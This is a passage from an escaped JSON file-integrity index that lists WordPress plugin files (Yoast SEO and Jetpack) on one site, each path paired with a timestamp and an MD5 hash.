s-seo\\/wpml-config.xml\":{\"d\":1545638232,\"h\":\"a3f0555d429ac59ab4896cfedeb4a10d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/index.php\":{\"d\":1545638235,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/wp-seo.php\":{\"d\":1545638243,\"h\":\"d883eec256dd9e45af129cfcab56adf8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/readme.txt\":{\"d\":1545638243,\"h\":\"ee92b8ce0fc8ec62fcbe0a184510d0ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-token.php\":{\"d\":1544704131,\"h\":\"2593d6e7e6901a1902ac32d8d91fd249\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-links.php\":{\"d\":1544704131,\"h\":\"d7138e03f1c7d2972857f9cd9e1552a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-jetpack-base.php\":{\"d\":1544704131,\"h\":\"ffa82287a462b3c8e110437128ab3e2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-metadata.php\":{\"d\":1544704131,\"h\":\"7dbe1262543d51fd69d354baa27e5420\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-platform-jetpack.php\":{\"d\":1544704131,\"h\":\"aac6e7a034a06b2400bd548877e28414\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-post-base.php\":{\"d\":1544704131,\"h\":\"fe50550759717c5ef84064ba34ddfece\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-jetpack.php\":{\"d\":1544704131,\"h\":\"f2f195117381aeaffa6b891ff228e1b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-platform.php\":{\"d\":1544704131,\"h\":\"d1aa69b0638673fbd0c5902dac4da156\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-post-jetpack.php\":{\"d\":1544704131,\"h\":\"7fe27b5a9067a907477a29d04dbfd28e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-date.php\":{\"d\":1544704131,\"h\":\"4bcd8d68e4c00f3e323701c92e6d8d2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-base.php\":{\"d\":1544704131,\"h\":\"3217f4c418298f0fdfe4882fab589940\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/debug-bar\\/class.jetpack-search-debug-bar.php\":{\"d\":1544704131,\"h\":\"70326ea72c90214e38f2edc612c366fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/debug-bar\\/debug-bar.css\":{\"d\":1544704131,\"h\":\"8bd1f1603f405beade8d38b41ef7fbe8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/debug-bar\\/debug-bar.js\":{\"d\":1544704131,\"h\":\"222bb6dfac6f5e6b49346ab5c32c2af1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/3rd-party.php\":{\"d\":1544704131,\"h\":\"ec6803540560965ff76038fd04bfa7ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/buddypress.php\":{\"d\":1544704131,\"h\":\"422482eef5502c652f36e57c9d334d5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/beaverbuilder.php\":{\"d\":1544704131,\"h\":\"c8b6e074a9792a93c944e45245fb74d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/class.jetpack-amp-support.php\":{\"d\":1544704131,\"h\":\"b6200bc339342dfa614d53bd372811f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/debug-bar.php\":{\"d\":1544704131,\"h\":\"12b141266055a3acab5f04f5e4d8679e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/woocommerce.php\":{\"d\":1544704131,\"h\":\"207fd358f7273693758be3d397f8ad2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/qtranslate-x.php\":{\"d\":1544704131,\"h\":\"029f308dc1a9544736b3c674aae224bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/polldaddy.php\":{\"d\":1544704131,\"h\":\"1f17a72c7967a0b5d30ec39c9cecc37e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/bbpress.php\":{\"d\":1544704131,\"h\":\"4aff96a4bd06bb59b4d3d2abe44113cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/bitly.php\":{\"d\":1544704131,\"h\":\"112f2b40ff0df3fe6e41d7b04f7bd240\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/vaultpress.php\":{\"d\":1544704131,\"h\":\"3b7d2c8b785661bf60e35c133614575b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/wpml.php\":{\"d\":1544704131,\"h\":\"86105fe79050b3ce86e40908ac481d07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/class.jetpack-modules-overrides.php\":{\"d\":1544704131,\"h\":\"dee71bc5e6ed05340d81e11cd60f416c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/domain-mapping.php\":{\"d\":1544704131,\"h\":\"0876e8438edbdb357fbb043b5d46a436\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/3rd-party\\/woocommerce-services.php\":{\"d\":1544704131,\"h\":\"2977971ae2999d5709ab608cab68c8fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/pages\\/_protect.scss\":{\"d\":1544704131,\"h\":\"de9f733684f5400e098afa2e0315674a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/pages\\/_manage.scss\":{\"d\":1544704131,\"h\":\"ebdc233d2d296687b72028fe158750d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/icons\\/_automatticons.scss\":{\"d\":1544704131,\"h\":\"c0735d97e36b1f33c53da603b6c81062\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/colors\\/_colors.scss\":{\"d\":1544704131,\"h\":\"ec2c40a3f9967c48914152836bcfcaa2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/typography\\/_variables.scss\":{\"d\":1544704131,\"h\":\"67ec47fa4f2be8257666e899d50bd405\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/typography\\/_functions.scss\":{\"d\":1544704131,\"h\":\"d626d6b8d7fdc573e91f7f4ebc2dfad6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/_animations.scss\":{\"d\":1544704131,\"h\":\"b488b8ed5a76269a37699faf94bd9e73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/atoms\\/_buttons.scss\":{\"d\":1544704131,\"h\":\"e2b7e54506d56619374caced5284a287\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/organisms\\/_banners.scss\":{\"d\":1544704131,\"h\":\"945082fa7007151f6bd9eea1d3259788\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/molecules\\/_nav-horizontal.scss\":{\"d\":1544704131,\"h\":\"4d74b9385232c10ec0a27d2f8861561a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/_utilities\\/mixins\\/_breakpoint.scss\":{\"d\":1544704131,\"h\":\"3fdddfa82f7ffa0242039e0bcf11e4af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/_utilities\\/_grid.scss\":{\"d\":1544704131,\"h\":\"61eca63905a501d5548815c54ebfdb29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/_utilities\\/_accessibility.scss\":{\"d\":1544704131,\"h\":\"4cc7918096db515d3ba1b5f526013b64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/templates\\/_connection-landing.scss\":{\"d\":1544704131,\"h\":\"34c88996dd92c5338e1fbbbbb2bfc941\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/templates\\/_settings.scss\":{\"d\":1544704131,\"h\":\"e90014a8d9d457441b91f07a98ff9cec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/templates\\/_main.scss\":{\"d\":1544704131,\"h\":\"8c717602a8b7ad90c8c49a75f4498af0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-admin-jitm.scss\":{\"d\":1544704131,\"h\":\"5d6e324f134651833dea5b284243af5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/dashboard-widget.scss\":{\"d\":1544704131,\"h\":\"94e38a0fd1b95db844b3f1df5d2bbec6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-banners.scss\":{\"d\":1544704131,\"h\":\"2345c7e390759c676f51b48a044c9495\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-icons.scss\":{\"d\":1544704131,\"h\":\"21c5430be78bfa43b3d069374b2bdf6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-admin.scss\":{\"d\":1544704131,\"h\":\"abf3d83e08fb97b953714a1e0730fc25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-idc.scss\":{\"d\":1544704131,\"h\":\"bc46d8d7e11684cbfd7291ebe6cf08c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/scss\\/jetpack-idc-admin-bar.scss\":{\"d\":1544704131,\"h\":\"3ad896743e7e6892895842b92ca850d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.css\":{\"d\":1544704131,\"h\":\"b9c4cd2efda97bb4bfa94b163525bb53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.css\":{\"d\":1544704131,\"h\":\"07316d95515fc354c5d4f25d50a9799b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.css.map\":{\"d\":1544704131,\"h\":\"403562ee503ce0f68a4c116a9a6160d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.min.css\":{\"d\":1544704131,\"h\":\"3b84ea47563359bb57c917d65b028181\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.css.map\":{\"d\":1544704131,\"h\":\"c88d77e9d939ffabe9727bb5b922067f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.css\":{\"d\":1544704131,\"h\":\"544409210a52d2df4e037effcc1b122d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.min.css\":{\"d\":1544704131,\"h\":\"26b00bbfc8673fcca7bec48113017ef3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm.css\":{\"d\":1544704131,\"h\":\"39eb963c5a187d263ebaa6605a1d0e1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.css.map\":{\"d\":1544704131,\"h\":\"d4ff9dea5ddad430fbf7ed74d635e829\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm-rtl.css.map\":{\"d\":1544704131,\"h\":\"35e6d3e0870374ab1e55923eacf25022\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.css.map\":{\"d\":1544704131,\"h\":\"d4fde928d40fc31b07d054940d0476df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.css.map\":{\"d\":1544704131,\"h\":\"d6b2a7190728d655665361e197724b7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.min.css\":{\"d\":1544704131,\"h\":\"9f2a32761dbac2b654487a9af69cbe60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.css\":{\"d\":1544704131,\"h\":\"8b904706b68a893d4517d606acbe7f9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.min.css\":{\"d\":1544704131,\"h\":\"0ce65da657e773448fe2e9cb9e4a8650\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.min.css\":{\"d\":1544704131,\"h\":\"df3294cf1da91ef15e1ea6504ccc8559\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-rtl.css\":{\"d\":1544704131,\"h\":\"7881c0b4ec4f3a4b988b2c32613e339a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.css.map\":{\"d\":1544704131,\"h\":\"47f2e2a574db524d06a3b662768e2466\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm-rtl.min.css\":{\"d\":1544704131,\"h\":\"f5b55a38739701e6f4ecf71e2433c438\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.css\":{\"d\":1544704131,\"h\":\"226f6b58d1cbf4d92640c0724833eda7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.css.map\":{\"d\":1544704131,\"h\":\"d1de16aaa60c3d86facc8e1fab48afa1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.min.css\":{\"d\":1544704131,\"h\":\"6fc6d888a68a18847b17fda9aa565c1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.css.map\":{\"d\":1544704131,\"h\":\"514669250dbf5a439aba4091969dd7df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm.css.map\":{\"d\":1544704131,\"h\":\"7587355a40e4c9b0d891d63093f10156\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.css.map\":{\"d\":1544704131,\"h\":\"6d6a50ef83c261f3ae8fffe37cc9e34b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.css\":{\"d\":1544704131,\"h\":\"594ceb0f1b16265ea3790a87aa4c3853\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack.css\":{\"d\":1544704131,\"h\":\"6ebb9981a1f1c430395e8349b017cd94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.css\":{\"d\":1544704131,\"h\":\"d1eecfa85348f6d1f191b787204a6be8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.min.css\":{\"d\":1544704131,\"h\":\"bc79f88798dfef78bd0288298f688350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.min.css\":{\"d\":1544704131,\"h\":\"0ce65da657e773448fe2e9cb9e4a8650\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.min.css\":{\"d\":1544704131,\"h\":\"a746de32bc20433285569bacc07bcc01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.css.map\":{\"d\":1544704131,\"h\":\"61b5328a1b03ec70c825959779aeda33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.css\":{\"d\":1544704131,\"h\":\"b0b1675d45a9eef8d067a4e06a2933e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.css\":{\"d\":1544704131,\"h\":\"9adf1cf0be0fecf33bb0562e2fd21f53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.min.css\":{\"d\":1544704131,\"h\":\"bf6eddb046e5c8566c47819b0e95e404\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.css.map\":{\"d\":1544704131,\"h\":\"6574cdc7fe688c62f9c6536886575cbe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.css\":{\"d\":1544704131,\"h\":\"b6f64dbcb4d6fb27d81636a328c1f74f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.css\":{\"d\":1544704131,\"h\":\"f088608813d8b8868747ea1dd59a6403\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.min.css\":{\"d\":1544704131,\"h\":\"551a583ee19c486f58ddcaf2b2f66431\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm-rtl.css\":{\"d\":1544704131,\"h\":\"d12d306a2a771cb6fe6a4473ecb954b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.min.css\":{\"d\":1544704131,\"h\":\"a746de32bc20433285569bacc07bcc01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.css.min.map\":{\"d\":1544704131,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-jitm.min.css\":{\"d\":1544704131,\"h\":\"1ca779223b517cb74cfde9885bfcc7de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.css.map\":{\"d\":1544704131,\"h\":\"fe7894955cd7f2f1fd3c8c133603cc2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.css\":{\"d\":1544704131,\"h\":\"cd12863afa247682b1c12d9fa1dbed78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sk_SK.json\":{\"d\":1544704131,\"h\":\"a5d01270f48c1e0660a594e1eee10698\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-fa_IR.json\":{\"d\":1544704131,\"h\":\"4bc3f8db321f165e95578fb666048401\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_CR.json\":{\"d\":1544704131,\"h\":\"cb7416963fe249ad141fc0d66e1967a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-el.json\":{\"d\":1544704131,\"h\":\"fb2d49b4f741668923c8ecf0c1c4981e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ro_RO.json\":{\"d\":1544704131,\"h\":\"7d1310a919c6eca744c0c4bb6b229a51\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-zh_TW.json\":{\"d\":1544704131,\"h\":\"28f9533897b603cc7807b3934cc6d82c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-mk_MK.json\":{\"d\":1544704131,\"h\":\"d5df63a6146f3c7534e0b7fda67c6ecf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-hu_HU.json\":{\"d\":1544704135,\"h\":\"c8e22c3b2aa7e0c3acd615c9b4f93aa4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-nl_NL.json\":{\"d\":1544704135,\"h\":\"574b222b2fefe4efdea24d756a41932a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-th.json\":{\"d\":1544704135,\"h\":\"68b7c63b18398d5073668d4eff0ce074\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-uk.json\":{\"d\":1544704135,\"h\":\"5c5b0e516642e733af2dc73734a17cd9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_GB.json\":{\"d\":1544704135,\"h\":\"45655dc5c3d634e06c8a0bec53691d4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-nn_NO.json\":{\"d\":1544704135,\"h\":\"c3c3e95d75f71d5d384ceb71adfc50f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-nl_NL_formal.json\":{\"d\":1544704135,\"h\":\"4e796164671c9116c25636e21e879039\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ckb.json\":{\"d\":1544704135,\"h\":\"b8980a539931afc9839d9145ff9c7119\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ms_MY.json\":{\"d\":1544704135,\"h\":\"55a1077027b09246b61e5679ef93a6a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-lt_LT.json\":{\"d\":1544704135,\"h\":\"b99e0